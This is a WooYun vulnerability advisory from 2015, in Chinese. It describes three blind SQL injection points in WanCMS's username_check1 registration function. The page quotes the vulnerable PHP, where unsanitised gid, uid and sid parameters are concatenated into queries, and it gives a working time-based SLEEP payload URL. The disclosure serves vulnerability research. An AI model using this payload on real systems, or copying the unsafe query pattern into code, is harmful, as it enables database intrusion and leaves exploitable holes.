当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0143240

漏洞标题:wancms sql盲注三处(比较鸡肋)

相关厂商:wancms.com

漏洞作者: 不能忍

提交时间:2015-10-12 11:07

修复时间:2016-01-15 11:09

公开时间:2016-01-15 11:09

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:11

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-12: 细节已通知厂商并且等待厂商处理中
2015-10-17: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航
2015-12-11: 细节向核心白帽子及相关领域专家公开
2015-12-21: 细节向普通白帽子公开
2015-12-31: 细节向实习白帽子公开
2016-01-15: 细节向公众公开

简要描述:

详细说明:

/app/Lib/Action/AccountsAction.class.php //118行

public function username_check1() {
unset ( $_SESSION ['uid'] );
unset ( $_SESSION ['member'] );
cookie ( 'auth', '1' );
$html = uc_user_synlogout ();
$callback = isset ( $_GET ['jsonpCallback'] ) ? $_GET ['jsonpCallback'] : 'jsonpCallback';
$gid = htmlspecialchars($_GET['gid']); //并没有过滤
//若sid、uid 丢失 获取相应最新的开服 uid默认为平台默认推广账号
$uid_1 = htmlspecialchars($_GET['uid']); //推广编号 查询出他的上级id//这个同样是没有过滤
$username = strtolower(trim(htmlspecialchars($_GET ['cn'])));
$password = trim ( htmlspecialchars($_GET ['pwd']) );
$domain = $this->getdomain($_SERVER['HTTP_HOST']);
$email = $username.'@'.$domain;
if (! preg_match ( "/^([a-zA-Z0-9]|[._]){5,22}$/", $username )) {
$data = "{\"result\":\"err0003\"}";
echo $callback . '(' . $data . ')';die();
}
if (strlen ( $password ) < 6 || strlen ( $password ) > 22 || $password == "") {
$data = "{\"result\":\"err0006\"}";
echo $callback . '(' . $data . ')';die();
}
// #### 接入UC #####
$uid = uc_user_register($username,$password,$email);
$uid=321;
if ($uid <= 0) {
if ($uid == - 1) {
$data = "{\"result\":\"err0001\"}";
echo $callback . '(' . $data . ')';die();
} elseif ($uid == - 2) {
$data = "{\"result\":\"err0001\"}";
echo $callback . '(' . $data . ')';die();
} elseif ($uid == - 3) {
$data = "{\"result\":\"err0003\"}";
echo $callback . '(' . $data . ')';die();
} elseif ($uid == - 4) {
$data = "{\"result\":\"err0001\"}";
echo $callback . '(' . $data . ')';die();
} elseif ($uid == - 5) {
$data = "{\"result\":\"err0001\"}";
echo $callback . '(' . $data . ')';die();
} elseif ($uid == - 6) {
$data = "{\"result\":\"err0001\"}";
echo $callback . '(' . $data . ')';die();
} else {
$data = "{\"result\":\"err0001\"}";
echo $callback . '(' . $data . ')';die();
}
} else{ // 注册成功
$userinfo ['username'] = $username;
$userinfo ['nickname'] = $username;
$userinfo ['email'] = $email;
$userinfo ['point'] = "0";
$userinfo ['id_card'] = '';
$userinfo ['uid'] = $uid;
$model = M ( 'member' );
if ($model->add ($userinfo)) {

$extend = M ( 'member_extend_info' );
$extends_info ['uid'] = $uid;
$extends_info ['register_time'] = time ();
$extends_info ['register_ip'] = get_client_ip ();
$extends_info ['lastlogin_time'] = time ();
$extends_info ['lastlogin_ip'] = get_client_ip ();
$extends_info ['realname'] = '';
$extends_info ['from_soical'] = 'cps';
$extends_info ['gid'] = $gid;
$extends_info ['sid'] = htmlspecialchars($_GET['sid']);
$smodel = M('server');

if($extends_info ['sid']){
$extends_info ['sid'] = htmlspecialchars($_GET['sid']); //这也没过滤
}else{
$s_info= $smodel->where("status = '0' and gid = ".$gid)->order('add_time desc')->select();
$extends_info ['sid'] =$s_info[0]['sid'];
}

//确保sid与gid是同一款游戏
$s_info1= $smodel->where("sid = ".$extends_info ['sid'])->find(); //这是第三处
if($s_info1['gid']!=$extends_info ['gid']){
$s_info= $smodel->where("status = '0' and gid = ".$gid)->order('add_time desc')->select(); //这是第一处
$extends_info ['sid'] =$s_info[0]['sid'];
}


$sid = $extends_info ['sid'];
//推广链接本身就是一级公会链接
if($uid_1){
$info = $extend->where (' grouping = 1 and uid ='.$uid_1)->find (); //这是第二处
if (empty($info)) {
$extends_info ['sub_channels'] = '4';
$extends_info ['total_channels'] = '4';

}else{
$extends_info ['sub_channels'] = $uid_1;
if($info['subsign']=='0'){
$extends_info ['total_channels'] = $uid_1;
}else{
$extends_info ['total_channels'] = $info['subsign'];
}

}
}else{
$extends_info ['sub_channels'] = '4';
$extends_info ['total_channels'] = '4';
}
$extend->add($extends_info);
// 设置cookies
setcookie ('auth', uc_authcode ( $uid . "\t" . $username, 'ENCODE' ), 0, C ( 'COOKIE_PATH' ), C ( 'COOKIE_DOMAIN' ), 0, false );
setcookie ( 'name', $username, time () + 3600, "/" );
/**
* **********************************
*/
// 防止本机注册
import ( "@.ORG.Getmacaddr" );
$mac = new GetMacAddr ( PHP_OS );
$ip = get_client_ip ();
$macaddr = $mac->mac_addr;
setcookie ( "gameplf_anti_csrf", md5 ( $macaddr ), time () + 3600 * 24, "/" );
setcookie ( "login_check_ip", md5 ( $ip ), time () + 3600 * 24, "/" );

$ucsynlogin = uc_user_synlogin ( $uid );
$_SESSION ['uid'] = $uid;
$_SESSION ['member'] = $username;
$ucsynlogin =str_replace('"', "'", $ucsynlogin);
$data="{\"result\":\"success\",\"gid\":\"$gid\",\"fid\":\"$sid\",\"login\":\"$ucsynlogin\"}";
echo $callback . '(' . $data . ')';die();


} else {
$data = "{\"result\":\"err0001\"}";
echo $callback . '(' . $data . ')';die();
}


}




}


这三处都没过滤,但是有个问题,已经注册过的用户是不能再注册的。
所以每次注入的时候都必须使用不同的用户名来进行注入。
而且页面不回显,只能盲注了。
这个必须写脚本才能测试。所以比较鸡肋,但是注入还是存在的
给个payload测试一下。
http://localhost/accounts/username_check1/?gid=1&cn=test1ees&pwd=111111&sid=0&uid=1) AND (SELECT * FROM (SELECT(SLEEP(6)))test) AND 'wooyun'='wooyun'%23

漏洞证明:

QQ截图20150924174205.jpg

修复方案:

版权声明:转载请注明来源 不能忍@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-01-15 11:09

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无


漏洞评价:

评价